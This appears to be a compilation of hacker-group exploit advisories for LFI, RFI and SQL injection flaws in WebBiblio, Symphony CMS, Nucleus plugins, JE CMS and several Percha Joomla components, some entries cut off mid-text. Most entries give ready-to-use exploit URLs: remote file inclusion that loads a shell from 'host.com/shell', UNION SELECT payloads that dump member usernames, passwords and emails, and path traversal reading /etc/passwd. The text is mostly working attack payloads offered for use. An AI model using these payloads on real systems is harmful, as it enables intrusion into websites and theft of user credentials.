[o] WebBiblio Subject Gateway System Local File Inclusion Vulnerability
Software : WebBiblio version 3.0
Vendor : http://webbiblio.sourceforge.net/
Download : http://sourceforge.net/projects/webbiblio/files/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/

[o] SIMM Management System (SMS) Local File Inclusion Vulnerability
Software : SIMM Management System (SMS) version 2
Vendor : http://anodyne-productions.com/index.php/sms/index
Author : AntiSecurity [ NoGe Vrs-hCk …

[o] Symphony CMS Local File Inclusion Vulnerability
Software : Symphony CMS version 2.0.7
Download : http://symphony-cms.com/download/releases/current/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Nucleus Plugin Gallery RFI & SQLi Vulnerability
Software : NP_Gallery version 0.94
Download : http://wakka.xiffy.nl/_media/np_gallery_0941.zip?id=gallery&cache=cache
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
[o] Exploit
http://localhost/[path]/nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=[evilc0de]
http://localhost/[path]/index.php?action=plugin&name=gallery&type=album&id=[SQLi]
http://localhost/[path]/index.php?action=plugin&name=gallery&type=item&id=[SQLi]
[o] PoC
http://localhost/nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://host.com/shell?
http://localhost/index.php?action=plugin&name=gallery&type=album&id=1+and+1=2+union+select+1,group_concat(mname,0x3a,mrealname,0x3a,mpassword,0x3a,memail),3,4,5,6,7,8,9,10+from+nucleus_member--
http://localhost/index.php?action=plugin&name=gallery&type=item&id=1+and+1=2+union+select+1,group_concat(mname,0x3a,mrealname,0x3a,mpassword,0x3a,memail),3,4,5,6,7,8,9,10+from+nucleus_member--
[o] Greetz
Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews wishnusakti
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11 inc0mp13te
ArRay …

[o] Nucleus Plugin Twitter Remote File Inclusion Vulnerability
Software : NP_Twitter version 0.8
Download : http://edmondhui.homeip.net/nudn?file=2/NP_Twitter_v0_8.zip
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
[o] Exploit
http://localhost/[path]/nucleus/plugins/NP_Twitter.php?DIR_PLUGINS=[evilc0de]
[o] PoC
http://localhost/nucleus/plugins/NP_Twitter.php?DIR_PLUGINS=http://host.com/shell?
[o] Greetz
Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews wishnusakti
skulmatic …

[+] JE CMS SQL Injection Vulnerability
Software : JE CMS version 1.1
Vendor : http://joenasejes.cz.cc/
Author : Antisecurity Team
Contact : public[at]antisecurity.org
Homepage : http://antisecurity.org
[+] Exploit
http://[site]/[path]/index.php?jepage=viewcategory&categoryid=[sqli]
[+] PoC
http://localhost/index.php?jepage=viewcategory&categoryid=84+and+1=2+union+all+select+1,group_concat(username,0x3a,password),3,4,5,6+from+users--

[+] Joomla Component Percha Image Attach LFI Vuln
Software : com_perchaimageattach version 1.1
Vendor : http://www.percha.com/
Author : Antisecurity Team
Contact : public[at]antisecurity.org
Homepage : http://antisecurity.org
[+] Exploit
http://[site]/[path]/index.php?option=com_perchaimageattach&controller=[LFI]
[+] PoC
http://localhost/index.php?option=com_perchaimageattach&controller=../../../../../../../../etc/passwd%00

[+] Joomla Component Percha Gallery LFI Vuln
Software : com_perchagallery version 1.6 Beta
Vendor : http://www.percha.com/
Author : Antisecurity Team
Contact : public[at]antisecurity.org
Homepage : http://antisecurity.org
[+] Exploit
http://[site]/[path]/index.php?option=com_perchagallery&controller=[LFI]
[+] PoC
http://localhost/index.php?option=com_perchagallery&controller=../../../../../../../../etc/passwd%00

[+] Joomla Component Percha Fields Attach LFI Vuln
Software : com_perchafieldsattach version 1.x
Vendor : http://www.percha.com/
Author : Antisecurity Team
Contact : public[at]antisecurity.org
Homepage : http://antisecurity.org
[+] Exploit
http://[site]/[path]/index.php?option=com_perchafieldsattach&controller=[LFI]
[+] PoC
http://localhost/index.php?option=com_perchafieldsattach&controller=../../../../../../../../etc/passwd%00

[+] Joomla Component Percha Downloads Attach LFI Vuln
Software : com_perchadownloadsattach version 1.1
Vendor : http://www.percha.com/
Author : Antisecurity Team
Contact : public[at]antisecurity.org
Homepage : http://antisecurity.org
[+] Exploit
http://[site]/[path]/index.php?option=com_perchadownloadsattach&controller=[LFI]
[+] PoC
http://localhost/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../etc/passwd%00